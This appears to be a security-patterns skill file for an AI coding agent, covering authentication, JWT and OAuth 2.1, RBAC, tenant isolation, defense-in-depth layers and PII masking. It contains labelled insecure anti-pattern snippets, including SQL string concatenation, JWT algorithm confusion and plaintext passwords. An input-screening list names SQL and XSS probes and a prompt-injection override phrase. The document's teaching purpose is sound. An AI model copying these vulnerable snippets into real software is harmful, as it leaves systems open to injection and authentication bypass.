Security Patterns
Security patterns for authentication, defense-in-depth, input validation, OWASP Top 10, LLM safety, and PII masking. Use when implementing auth flows, security layers, input sanitization, vulnerability prevention, prompt injection defense, or data redaction.
Primary Agent: security-auditor
Security Patterns
Comprehensive security patterns for building hardened applications. Each category has individual rule files in rules/ loaded on-demand.
Quick Reference
| Category | Rules | Impact | When to Use |
|---|---|---|---|
| Authentication | 3 | CRITICAL | JWT tokens, OAuth 2.1/PKCE, RBAC/permissions |
| Defense-in-Depth | 2 | CRITICAL | Multi-layer security, zero-trust architecture |
| Input Validation | 3 | HIGH | Schema validation (Zod/Pydantic), output encoding, file uploads |
| OWASP Top 10 | 2 | CRITICAL | Injection prevention, broken authentication fixes |
| LLM Safety | 3 | HIGH | Prompt injection defense, output guardrails, content filtering |
| PII Masking | 2 | HIGH | PII detection/redaction with Presidio, Langfuse, LLM Guard |
| Scanning | 3 | HIGH | Dependency audit, SAST (Semgrep/Bandit), secret detection |
| Advanced Guardrails | 2 | CRITICAL | NeMo/Guardrails AI validators, red-teaming, OWASP LLM |
Total: 20 rules across 8 categories
Quick Start
# Argon2id password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)
ph.verify(password_hash, password)

# JWT access token (15-min expiry)
import jwt
from datetime import datetime, timedelta, timezone
payload = {
'sub': user_id, 'type': 'access',
'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
}
token = jwt.encode(payload, SECRET_KEY, algorithm='HS256')

// Zod v4 schema validation
import { z } from 'zod';
const UserSchema = z.object({
email: z.email(), // Zod v4 top-level format; z.string().email() is deprecated
name: z.string().min(2).max(100),
role: z.enum(['user', 'admin']).default('user'),
});
const result = UserSchema.safeParse(req.body);

# PII masking with Langfuse
import re
from langfuse import Langfuse
def mask_pii(data, **kwargs):
if isinstance(data, str):
data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
return data
langfuse = Langfuse(mask=mask_pii)

Authentication
Secure authentication with OAuth 2.1, Passkeys/WebAuthn, JWT tokens, and role-based access control.
| Rule | Description |
|---|---|
auth-jwt.md | JWT creation, verification, expiry, refresh token rotation |
auth-oauth.md | OAuth 2.1 with PKCE, DPoP, Passkeys/WebAuthn |
auth-rbac.md | Role-based access control, permission decorators, MFA |
Key Decisions: Argon2id > bcrypt | Access tokens 15 min | PKCE required | Passkeys > TOTP > SMS
Defense-in-Depth
Multi-layer security architecture with no single point of failure.
| Rule | Description |
|---|---|
defense-layers.md | 8-layer security architecture (edge to observability) |
defense-zero-trust.md | Immutable request context, tenant isolation, audit logging |
Key Decisions: Immutable dataclass context | Query-level tenant filtering | No IDs in LLM prompts
Input Validation
Validate and sanitize all untrusted input using Zod v4 and Pydantic.
| Rule | Description |
|---|---|
validation-input.md | Schema validation with Zod v4 and Pydantic, type coercion |
validation-output.md | HTML sanitization, output encoding, XSS prevention |
validation-schemas.md | Discriminated unions, file upload validation, URL allowlists |
Key Decisions: Allowlist over blocklist | Server-side always | Validate magic bytes not extensions
OWASP Top 10
Protection against the most critical web application security risks.
| Rule | Description |
|---|---|
owasp-injection.md | SQL/command injection, parameterized queries, SSRF prevention |
owasp-broken-auth.md | JWT algorithm confusion, CSRF protection, timing attacks |
Key Decisions: Parameterized queries only | Hardcode JWT algorithm | SameSite=Strict cookies
LLM Safety
Security patterns for LLM integrations including context separation and output validation.
| Rule | Description |
|---|---|
llm-prompt-injection.md | Context separation, prompt auditing, forbidden patterns |
llm-guardrails.md | Output validation pipeline: schema, grounding, safety, size |
llm-content-filtering.md | Pre-LLM filtering, post-LLM attribution, three-phase pattern |
Key Decisions: IDs flow around LLM, never through | Attribution is deterministic | Audit every prompt
PII Masking
PII detection and masking for LLM observability pipelines and logging.
| Rule | Description |
|---|---|
pii-detection.md | Microsoft Presidio, regex patterns, LLM Guard Anonymize |
pii-redaction.md | Langfuse mask callback, structlog/loguru processors, Vault deanonymization |
Key Decisions: Presidio for enterprise | Replace with type tokens | Use mask callback at init
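Before reaching for Presidio, the "replace with type tokens" decision can be sketched with plain regex. The patterns are deliberately minimal and illustrative; Presidio's recognizers are far more robust for production use:

```python
import re

# Order matters: specific patterns (SSN) run before the generic card pattern.
PII_PATTERNS = [
    (re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"), "<EMAIL>"),
    (re.compile(r"\b\d{3}-\d{2}-\d{4}\b"), "<SSN>"),
    (re.compile(r"\b\d(?:[ -]?\d){12,15}\b"), "<CARD>"),
]

def redact(text: str) -> str:
    """Replace detected PII with type tokens, preserving sentence shape."""
    for pattern, token in PII_PATTERNS:
        text = pattern.sub(token, text)
    return text
```

Type tokens (`<EMAIL>` rather than a blank) keep redacted traces readable for debugging and evaluation.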
Scanning
Automated security scanning for dependencies, code, and secrets.
| Rule | Description |
|---|---|
scanning-dependency.md | npm audit, pip-audit, Trivy container scanning, CI gating |
scanning-sast.md | Semgrep and Bandit static analysis, custom rules, pre-commit |
scanning-secrets.md | Gitleaks, TruffleHog, detect-secrets with baseline management |
Key Decisions: Pre-commit hooks for shift-left | Block on critical/high | Gitleaks + detect-secrets baseline
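A minimal CI gate for the dependency-audit decision might look like this. It assumes pip-audit's `--format json` report with a top-level `dependencies` list; the exact shape varies by version, so treat the parsing as a sketch:

```python
import json
import subprocess
import sys

def count_vulnerable(report: dict) -> int:
    """Count dependencies with at least one known vulnerability."""
    return sum(1 for dep in report.get("dependencies", []) if dep.get("vulns"))

def gate() -> int:
    # pip-audit exits non-zero when findings exist; parse the JSON report
    # anyway so the build log shows what was flagged before failing.
    proc = subprocess.run(
        ["pip-audit", "--format", "json"], capture_output=True, text=True
    )
    report = json.loads(proc.stdout or '{"dependencies": []}')
    flagged = count_vulnerable(report)
    if flagged:
        print(f"Blocking build: {flagged} vulnerable dependencies", file=sys.stderr)
        return 1
    return 0
```

The same gate shape works for Semgrep and Gitleaks, which also emit JSON findings suitable for block-on-critical policies.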
Advanced Guardrails
Production LLM safety with NeMo Guardrails, Guardrails AI validators, and DeepTeam red-teaming.
| Rule | Description |
|---|---|
guardrails-nemo.md | NeMo Guardrails, Colang 2.0 flows, Guardrails AI validators, layered validation |
guardrails-llm-validation.md | DeepTeam red-teaming (40+ vulnerabilities), OWASP LLM Top 10 compliance |
Key Decisions: NeMo for flows, Guardrails AI for validators | Toxicity 0.5 threshold | Red-team pre-release + quarterly
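The layered-validation decision above can be sketched framework-free. Here `toxicity_score` stands in for a real classifier (for example a Guardrails AI toxicity validator); the check names and the 4000-character cap are illustrative:

```python
from dataclasses import dataclass, field

TOXICITY_THRESHOLD = 0.5  # matches the key decision above

@dataclass
class ValidationResult:
    passed: bool
    failures: list[str] = field(default_factory=list)

def validate_output(text: str, toxicity_score: float, max_chars: int = 4000) -> ValidationResult:
    """Run layered checks in order; collect every failure for auditing."""
    failures = []
    if not text.strip():
        failures.append("empty_output")
    if len(text) > max_chars:
        failures.append("size_exceeded")
    if toxicity_score >= TOXICITY_THRESHOLD:
        failures.append("toxicity")
    return ValidationResult(passed=not failures, failures=failures)
```

Collecting all failures rather than short-circuiting gives the audit log a complete picture of why an output was blocked.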
Managed Hook Hierarchy (CC 2.1.49)
Plugin settings follow a 3-tier precedence:
| Tier | Source | Overridable? |
|---|---|---|
1. Managed (plugin settings.json) | Plugin author ships defaults | Yes, by user |
2. Project (.claude/settings.json) | Repository config | Yes, by user |
3. User (~/.claude/settings.json) | Personal preferences | Final authority |
Security hooks shipped by OrchestKit are managed defaults — users can disable them but are warned. Enterprise admins can lock settings via managed profiles.
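As an illustration of tier 2, a repository's `.claude/settings.json` could layer a project hook on top of the managed defaults. The script path is hypothetical; the structure follows Claude Code's hooks settings format:

```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          { "type": "command", "command": "./scripts/pre-bash-secret-scan.sh" }
        ]
      }
    ]
  }
}
```

A user-tier `~/.claude/settings.json` with the same keys takes final precedence per the table above.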
Anti-Patterns (FORBIDDEN)
# Authentication
user.password = request.form['password'] # Plaintext password storage
response_type=token # Implicit OAuth grant (deprecated)
return "Email not found" # Information disclosure
# Input Validation
"SELECT * FROM users WHERE name = '" + name + "'" # SQL injection
if (file.type === 'image/png') {...} # Trusting Content-Type header
# LLM Safety
prompt = f"Analyze for user {user_id}" # ID in prompt
artifact.user_id = llm_output["user_id"] # Trusting LLM-generated IDs
# PII
logger.info(f"User email: {user.email}") # Raw PII in logs
langfuse.trace(input=raw_prompt) # Unmasked observability data

Detailed Documentation
| Resource | Description |
|---|---|
| references/oauth-2.1-passkeys.md | OAuth 2.1, PKCE, DPoP, Passkeys/WebAuthn |
| references/request-context-pattern.md | Immutable request context for identity flow |
| references/tenant-isolation.md | Tenant-scoped repository, vector/full-text search |
| references/audit-logging.md | Sanitized structured logging, compliance |
| references/zod-v4-api.md | Zod v4 types, coercion, transforms, refinements |
| references/vulnerability-demos.md | OWASP vulnerable vs secure code examples |
| references/context-separation.md | LLM context separation architecture |
| references/output-guardrails.md | Output validation pipeline implementation |
| references/pre-llm-filtering.md | Tenant-scoped retrieval, content extraction |
| references/post-llm-attribution.md | Deterministic attribution pattern |
| references/prompt-audit.md | Prompt audit patterns, safe prompt builder |
| references/presidio-integration.md | Microsoft Presidio setup, custom recognizers |
| references/langfuse-mask-callback.md | Langfuse SDK mask implementation |
| references/llm-guard-sanitization.md | LLM Guard Anonymize/Deanonymize with Vault |
| references/logging-redaction.md | structlog/loguru pre-logging redaction |
Related Skills
- api-design-framework — API security patterns
- rag-retrieval — RAG pipeline patterns requiring tenant-scoped retrieval
- llm-evaluation — Output quality assessment including hallucination detection
Capability Details
authentication
Keywords: password, hashing, JWT, token, OAuth, PKCE, passkey, WebAuthn, RBAC, session
Solves:
- Implement secure authentication with modern standards
- JWT token management with proper expiry
- OAuth 2.1 with PKCE flow
- Passkeys/WebAuthn registration and login
- Role-based access control
defense-in-depth
Keywords: defense in depth, security layers, multi-layer, request context, tenant isolation
Solves:
- How to secure AI applications end-to-end
- Implement 8-layer security architecture
- Create immutable request context
- Ensure tenant isolation at query level
input-validation
Keywords: schema, validate, Zod, Pydantic, sanitize, HTML, XSS, file upload
Solves:
- Validate input against schemas (Zod v4, Pydantic)
- Prevent injection attacks with allowlists
- Sanitize HTML and prevent XSS
- Validate file uploads by magic bytes
owasp-top-10
Keywords: OWASP, sql injection, broken access control, CSRF, XSS, SSRF
Solves:
- Fix OWASP Top 10 vulnerabilities
- Prevent SQL and command injection
- Implement CSRF protection
- Fix broken authentication
llm-safety
Keywords: prompt injection, context separation, guardrails, hallucination, LLM output
Solves:
- Prevent prompt injection attacks
- Implement context separation (IDs around LLM)
- Validate LLM output with guardrail pipeline
- Deterministic post-LLM attribution
pii-masking
Keywords: PII, masking, Presidio, Langfuse, redact, GDPR, privacy
Solves:
- Detect and mask PII in LLM pipelines
- Integrate masking with Langfuse observability
- Implement pre-logging redaction
- GDPR-compliant data handling
Rules (20)
Auth: JWT Tokens & Password Hashing — CRITICAL
JWT Tokens & Password Hashing
Password Hashing (Argon2id)
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError
ph = PasswordHasher(
time_cost=3, # Number of iterations
memory_cost=65536, # 64 MB
parallelism=4, # Number of threads
)
def hash_password(password: str) -> str:
return ph.hash(password)
def verify_password(password_hash: str, password: str) -> bool:
try:
ph.verify(password_hash, password)
return True
except VerifyMismatchError:
return False
def needs_rehash(password_hash: str) -> bool:
return ph.check_needs_rehash(password_hash)

JWT Access Token
import os
import jwt
from datetime import datetime, timedelta, timezone
SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15
def create_access_token(user_id: str, roles: list[str] | None = None) -> str:
now = datetime.now(timezone.utc)
payload = {
"sub": user_id,
"type": "access",
"roles": roles or [],
"iat": now,
"exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
}
return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)
def verify_access_token(token: str) -> dict | None:
try:
payload = jwt.decode(
token, SECRET_KEY,
algorithms=[ALGORITHM], # NEVER read from header
options={'require': ['exp', 'iat', 'sub']},
)
if payload.get("type") != "access":
return None
return payload
except jwt.ExpiredSignatureError:
return None
except jwt.InvalidTokenError:
return None

Token Expiry Guidelines
| Token Type | Expiry | Storage |
|---|---|---|
| Access | 15 min - 1 hour | Memory only |
| Refresh | 7-30 days | HTTPOnly cookie |
Refresh Token Rotation
import secrets
import hashlib
from datetime import datetime, timedelta, timezone
def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
old_hash = hashlib.sha256(old_token.encode()).hexdigest()
token_record = db.query("""
SELECT user_id, version FROM refresh_tokens
WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
""", [old_hash]).fetchone()
if not token_record:
raise InvalidTokenError("Refresh token invalid or expired")
user_id, version = token_record
# Revoke old token
db.execute("UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?", [old_hash])
# Create new tokens
new_access_token = create_access_token(user_id)
new_refresh_token = secrets.token_urlsafe(32)
new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()
db.execute("""
INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
VALUES (?, ?, ?, ?)
""", [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])
return new_access_token, new_refresh_token

Session Security
app.config['SESSION_COOKIE_SECURE'] = True # HTTPS only
app.config['SESSION_COOKIE_HTTPONLY'] = True # No JS access
app.config['SESSION_COOKIE_SAMESITE'] = 'Strict'

Anti-Patterns
# NEVER store passwords in plaintext
user.password = request.form['password']
# NEVER trust algorithm from JWT header
payload = jwt.decode(token, SECRET, algorithms=jwt.get_unverified_header(token)['alg'])
# NEVER reveal if email exists
return "Email not found" # Information disclosure
# ALWAYS use Argon2id or bcrypt
password_hash = ph.hash(password)
# ALWAYS hardcode algorithm
payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
# ALWAYS use generic error messages
return "Invalid credentials"

Incorrect — Algorithm confusion vulnerability allows "none" algorithm attack:
# Reading algorithm from untrusted JWT header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" to bypass signature verification

Correct — Hardcode expected algorithm to prevent confusion attacks:
# Always specify the expected algorithm explicitly
payload = jwt.decode(
token, SECRET_KEY,
algorithms=['HS256'], # Never read from header
options={'require': ['exp', 'iat', 'sub']},
)

Implement OAuth 2.1 with mandatory PKCE, token rotation, and phishing-resistant passkeys — CRITICAL
OAuth 2.1 & Passkeys/WebAuthn
OAuth 2.1 Key Changes
- PKCE required for ALL clients (not just public)
- Implicit grant removed (security vulnerability)
- Password grant removed (credential anti-pattern)
- Refresh token rotation mandatory
PKCE Flow (Required)
import hashlib, base64, secrets
def generate_pkce_pair():
code_verifier = secrets.token_urlsafe(64)
digest = hashlib.sha256(code_verifier.encode()).digest()
code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
return code_verifier, code_challenge
verifier, challenge = generate_pkce_pair()
# Step 1: Authorization request (build with urlencode so the URL has no stray whitespace)
from urllib.parse import urlencode
auth_params = {
    "response_type": "code",
    "client_id": client_id,
    "redirect_uri": redirect_uri,
    "code_challenge": challenge,
    "code_challenge_method": "S256",
    "state": state,
    "scope": "openid profile",
}
auth_url = "https://auth.example.com/authorize?" + urlencode(auth_params)
# Step 2: Exchange code for tokens
token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"redirect_uri": redirect_uri,
"client_id": client_id,
"code_verifier": verifier,
}
)

DPoP (Demonstrating Proof of Possession)
import jwt, time, uuid
def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
claims = {
"jti": str(uuid.uuid4()),
"htm": http_method,
"htu": http_uri,
"iat": int(time.time()),
}
headers = {
"typ": "dpop+jwt",
"alg": "ES256",
"jwk": jwt.algorithms.ECAlgorithm.to_jwk(private_key.public_key(), as_dict=True),  # public key as RFC 7517 JWK
}
return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)

Passkeys/WebAuthn Registration
from webauthn import generate_registration_options, verify_registration_response
from webauthn.helpers.structs import (
AuthenticatorSelectionCriteria,
ResidentKeyRequirement,
UserVerificationRequirement,
)
options = generate_registration_options(
rp_id="example.com",
rp_name="Example App",
user_id=user.id.encode(),
user_name=user.email,
authenticator_selection=AuthenticatorSelectionCriteria(
resident_key=ResidentKeyRequirement.REQUIRED,
user_verification=UserVerificationRequirement.REQUIRED,
),
)

Passkeys Authentication
from webauthn import generate_authentication_options, verify_authentication_response
options = generate_authentication_options(
rp_id="example.com",
allow_credentials=[
{"id": cred.credential_id, "type": "public-key"}
for cred in user.credentials
],
)
verification = verify_authentication_response(
credential=client_response,
expected_challenge=stored_challenge,
expected_rp_id="example.com",
expected_origin="https://example.com",
credential_public_key=stored_credential.public_key,
credential_current_sign_count=stored_credential.sign_count,
)
# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_count

Frontend Passkey Implementation
// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
const credential = await navigator.credentials.create({ publicKey: options });
await fetch('/api/auth/passkey/register', {
method: 'POST', body: JSON.stringify(credential),
});
}
// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
const available = await PublicKeyCredential.isConditionalMediationAvailable();
if (available) {
const credential = await navigator.credentials.get({
publicKey: options, mediation: 'conditional',
});
}
}

Anti-Patterns
# NEVER use implicit OAuth grant
response_type=token # Deprecated in OAuth 2.1
# NEVER skip PKCE
# PKCE is required for ALL clients in OAuth 2.1
# ALWAYS use PKCE with S256
code_challenge=challenge&code_challenge_method=S256

Incorrect — OAuth 2.0 token exchange without PKCE is vulnerable to interception:
# No PKCE verification
token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"client_id": client_id,
}
)

Correct — OAuth 2.1 requires PKCE for all clients to prevent code interception:
# Generate and verify PKCE challenge
verifier, challenge = generate_pkce_pair()
token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"client_id": client_id,
"code_verifier": verifier, # Proves client possession
}
)

Enforce role-based access control with multi-factor authentication and rate limiting — CRITICAL
Role-Based Access Control & Multi-Factor Authentication
Role-Based Access Control
from functools import wraps
from flask import abort, g
def require_role(*roles):
"""Decorator to require specific role(s)."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not any(role in g.current_user.roles for role in roles):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
def require_permission(permission: str):
"""Decorator to require specific permission."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not g.current_user.has_permission(permission):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
return get_all_users()
@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
return get_patient_by_id(id)

FastAPI RBAC
from fastapi import Depends, HTTPException, status
from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials
security = HTTPBearer()
async def get_current_user(
credentials: HTTPAuthorizationCredentials = Depends(security)
):
payload = verify_access_token(credentials.credentials)
if not payload:
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
user = await get_user_by_id(payload["sub"])
if not user:
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
return user
def require_role(*roles):
async def role_checker(user = Depends(get_current_user)):
if not any(role in user.roles for role in roles):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN)
return user
return role_checker

Multi-Factor Authentication (TOTP)
import pyotp
import qrcode
from io import BytesIO
import base64
def generate_totp_secret() -> str:
return pyotp.random_base32()
def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
totp = pyotp.TOTP(secret)
return totp.provisioning_uri(name=email, issuer_name=issuer)
def verify_totp(secret: str, code: str) -> bool:
totp = pyotp.TOTP(secret)
return totp.verify(code, valid_window=1)

Complete Login Flow with MFA
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
email = request.json.get('email')
password = request.json.get('password')
user = User.query.filter_by(email=email).first()
# Don't reveal if user exists
if not user or not verify_password(user.password_hash, password):
return {"error": "Invalid credentials"}, 401
if user.mfa_enabled:
mfa_token = create_mfa_pending_token(user.id)
return {"mfa_required": True, "mfa_token": mfa_token}
return issue_tokens(user)

Rate Limiting
| Endpoint | Limit |
|---|---|
| Login | 5 per minute |
| Password reset | 3 per hour |
| MFA verify | 5 per minute |
| Registration | 10 per hour |
| API general | 100 per minute |
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
limiter = Limiter(app, key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"],
storage_uri="redis://localhost:6379")
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
pass
@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour")
def password_reset():
return {"message": "If email exists, reset link sent"}

Key Decisions
| Decision | Recommendation |
|---|---|
| MFA method | Passkeys > TOTP > SMS |
| Rate limit | 5 attempts per minute |
| Error messages | Generic "Invalid credentials" |
| Account lockout | After 10 failed attempts |
| Backup codes | 10 one-time use codes |
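The backup-code decision above can be sketched as follows. Because the codes are high-entropy random values (unlike passwords), a fast hash is a common storage choice, though Argon2id also works; the helper names are illustrative:

```python
import hashlib
import secrets

def generate_backup_codes(n: int = 10) -> tuple[list[str], list[str]]:
    """Return (plaintext codes to show the user once, hashes to store)."""
    codes = [secrets.token_hex(4) for _ in range(n)]  # 8 hex chars each
    hashes = [hashlib.sha256(c.encode()).hexdigest() for c in codes]
    return codes, hashes

def redeem_backup_code(code: str, stored_hashes: set[str]) -> bool:
    """One-time use: remove the hash on successful verification."""
    h = hashlib.sha256(code.encode()).hexdigest()
    if h in stored_hashes:
        stored_hashes.discard(h)
        return True
    return False
```

Removing the hash on redemption is what enforces the one-time-use guarantee; the plaintext codes are never stored.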
Incorrect — Direct role checks in routes leak user enumeration information:
@app.route('/admin/users')
def admin_users():
if 'admin' not in current_user.roles:
return {"error": "You are not an admin"}, 403 # Reveals role info
return get_all_users()

Correct — Generic error messages and proper RBAC decorator prevent enumeration:
@app.route('/admin/users')
@require_role('admin')
def admin_users():
return get_all_users()
# Returns 403 Forbidden with no role details exposed

Design defense-in-depth with eight security layers from edge protection to observability — CRITICAL
8-Layer Security Architecture
Overview
Defense in depth applies multiple security layers so that if one fails, others still protect the system.
Core Principle: No single security control should be the only thing protecting sensitive operations.
The Architecture
Layer 0: EDGE | WAF, Rate Limiting, DDoS, Bot Detection
Layer 1: GATEWAY | JWT Verify, Extract Claims, Build Context
Layer 2: INPUT | Schema Validation, PII Detection, Injection Defense
Layer 3: AUTHORIZATION | RBAC/ABAC, Tenant Check, Resource Access
Layer 4: DATA ACCESS | Parameterized Queries, Tenant Filter
Layer 5: LLM | Prompt Building (no IDs), Context Separation
Layer 6: OUTPUT | Schema Validation, Guardrails, Hallucination Check
Layer 7: STORAGE | Attribution, Audit Trail, Encryption
Layer 8: OBSERVABILITY | Logging (sanitized), Tracing, Metrics

Layer Details
Layer 0: Edge Protection
- WAF rules for OWASP Top 10
- Rate limiting per user/IP
- DDoS protection
- Bot detection and geo-blocking
Layer 1: Gateway / Authentication
@dataclass(frozen=True)
class RequestContext:
"""Immutable context that flows through the system"""
user_id: UUID
tenant_id: UUID
session_id: str
permissions: frozenset[str]
request_id: str
trace_id: str
timestamp: datetime
client_ip: str

Layer 2: Input Validation
- Schema validation: Pydantic/Zod for structure
- Content validation: PII detection, malware scan
- Injection defense: SQL, XSS, prompt injection patterns
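A minimal pre-screen for the injection-defense bullet might look like this. The patterns are illustrative probes, not a complete ruleset, and this layer sits behind schema validation (Pydantic/Zod), never in place of it:

```python
import re

# Illustrative deny patterns for a Layer 2 pre-screen.
INJECTION_PATTERNS = [
    re.compile(r"(?i)\bunion\s+select\b"),                    # SQL injection probe
    re.compile(r"(?i)<script\b"),                             # reflected XSS probe
    re.compile(r"(?i)ignore (all )?previous instructions"),   # prompt injection
]

def screen_input(text: str) -> list[str]:
    """Return the patterns that matched; an empty list means clean."""
    return [p.pattern for p in INJECTION_PATTERNS if p.search(text)]
```

Matches should be logged for the audit trail (Layer 8) even when the request is rejected outright.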
Layer 3: Authorization
async def authorize(ctx: RequestContext, action: str, resource: Resource) -> bool:
if action not in ctx.permissions:
raise Forbidden("Missing permission")
if resource.tenant_id != ctx.tenant_id:
raise Forbidden("Cross-tenant access denied")
if not await check_resource_access(ctx.user_id, resource):
raise Forbidden("No access to resource")
return True

Layer 4: Data Access
class TenantScopedRepository:
def __init__(self, ctx: RequestContext):
self.ctx = ctx
self._base_filter = {"tenant_id": ctx.tenant_id}
async def find(self, query: dict) -> list[Model]:
safe_query = {**self._base_filter, **query}
return await self.db.find(safe_query)

Layer 5: LLM Orchestration
- Identifiers flow AROUND the LLM, not THROUGH it
- Prompts contain only content text
- No user_id, tenant_id, document_id in prompt text
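The "IDs flow around the LLM" rule can be sketched with two helpers (names are illustrative): the prompt builder only ever sees content text, and attribution is reattached afterwards from the trusted context:

```python
from uuid import UUID, uuid4

def build_prompt(document_text: str) -> str:
    """Prompt contains content text only; identifiers never enter it."""
    return f"Summarize the following document:\n\n{document_text}"

def attach_attribution(llm_output: str, ctx_user_id: UUID, doc_id: UUID) -> dict:
    """Attribution comes from the trusted request context, never from the LLM."""
    return {"summary": llm_output, "user_id": ctx_user_id, "document_id": doc_id}
```

Because the prompt builder's signature cannot accept an ID, an audit of call sites is enough to verify the invariant.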
Layer 6: Output Validation
- Schema validation (JSON structure)
- Content guardrails (toxicity, PII generation)
- Hallucination detection (grounding check)
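The grounding check can be approximated with token overlap as a first pass; this is a naive stand-in for a real entailment or citation checker, and the 0.6 threshold is illustrative:

```python
def grounding_score(answer: str, sources: list[str]) -> float:
    """Fraction of answer tokens that appear in the retrieved sources."""
    answer_tokens = set(answer.lower().split())
    if not answer_tokens:
        return 0.0
    source_tokens = set(" ".join(sources).lower().split())
    return len(answer_tokens & source_tokens) / len(answer_tokens)

def check_grounded(answer: str, sources: list[str], threshold: float = 0.6) -> bool:
    """Gate the output: below-threshold answers are treated as ungrounded."""
    return grounding_score(answer, sources) >= threshold
```

Low-scoring outputs should be blocked or regenerated rather than silently passed through to Layer 7.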
Layer 7: Attribution & Storage
- Attribution is deterministic, not LLM-generated
- Context from Layer 1 is attached to results
- Audit trail recorded
Layer 8: Observability
- Structured logging with sanitization
- Distributed tracing (Langfuse)
- Metrics (latency, errors, costs)
Implementation Checklist
- Layer 0: Rate limiting configured
- Layer 1: JWT validation active, RequestContext created
- Layer 2: Pydantic models validate all input
- Layer 3: Authorization check on every endpoint
- Layer 4: All queries include tenant_id filter
- Layer 5: No IDs in LLM prompts (run audit)
- Layer 6: Output schema validation active
- Layer 7: Attribution uses context, not LLM output
- Layer 8: Logging sanitized, tracing enabled
Industry Sources
| Pattern | Source | Application |
|---|---|---|
| Defense in Depth | NIST | Multiple validation layers |
| Zero Trust | Google BeyondCorp | Every request verified |
| Least Privilege | AWS IAM | Minimal permissions |
| Complete Mediation | Saltzer & Schroeder | Every access checked |
Incorrect — Single-layer auth check is vulnerable if JWT verification is bypassed:
@app.get("/documents/{doc_id}")
def get_document(doc_id: UUID, token: str = Header(...)):
claims = verify_jwt(token) # Only layer
return db.query(Document).get(doc_id)

Correct — Multi-layer defense verifies auth, validates input, checks authorization, and filters data:
@app.get("/documents/{doc_id}")
async def get_document(doc_id: UUID, ctx: RequestContext = Depends(get_context)):
# Layer 1: Gateway verified JWT
# Layer 2: UUID validation (Pydantic)
# Layer 3: Authorization
await authorize(ctx, "documents:read", doc_id)
# Layer 4: Tenant-scoped query
repo = TenantScopedRepository(db, ctx, Document)
return await repo.find_by_id(doc_id)

Defense: Zero Trust & Tenant Isolation — CRITICAL
Zero Trust & Tenant Isolation
Immutable Request Context
from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet
@dataclass(frozen=True)
class RequestContext:
"""
System context that NEVER appears in LLM prompts.
Created at gateway, flows through all layers.
"""
# Identity
user_id: UUID
tenant_id: UUID
session_id: str
permissions: FrozenSet[str]
# Tracing
request_id: str
trace_id: str
span_id: str
# Resource
resource_id: UUID | None = None
resource_type: str | None = None
# Metadata
timestamp: datetime | None = None
client_ip: str = ""

Context Creation at Gateway
from fastapi import Request, Depends
async def get_request_context(request: Request) -> RequestContext:
auth_header = request.headers.get("Authorization", "")
if not auth_header.startswith("Bearer "):
raise HTTPException(401, "Missing authorization")
token = auth_header[7:]
claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
return RequestContext(
user_id=UUID(claims["sub"]),
tenant_id=UUID(claims["tenant_id"]),
session_id=claims["session_id"],
permissions=frozenset(claims.get("permissions", [])),
request_id=request.headers.get("X-Request-ID", str(uuid4())),
trace_id=generate_trace_id(),
span_id=generate_span_id(),
client_ip=request.client.host,
)

Tenant-Scoped Repository
class TenantScopedRepository(Generic[T]):
"""Cannot be bypassed - tenant filter is mandatory."""
def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
self.session = session
self.ctx = ctx
self.model = model
def _base_query(self):
return select(self.model).where(
self.model.tenant_id == self.ctx.tenant_id
)
async def find_by_id(self, id: UUID) -> T | None:
"""Even by-ID lookup includes tenant check."""
query = self._base_query().where(self.model.id == id)
result = await self.session.execute(query)
return result.scalar_one_or_none()
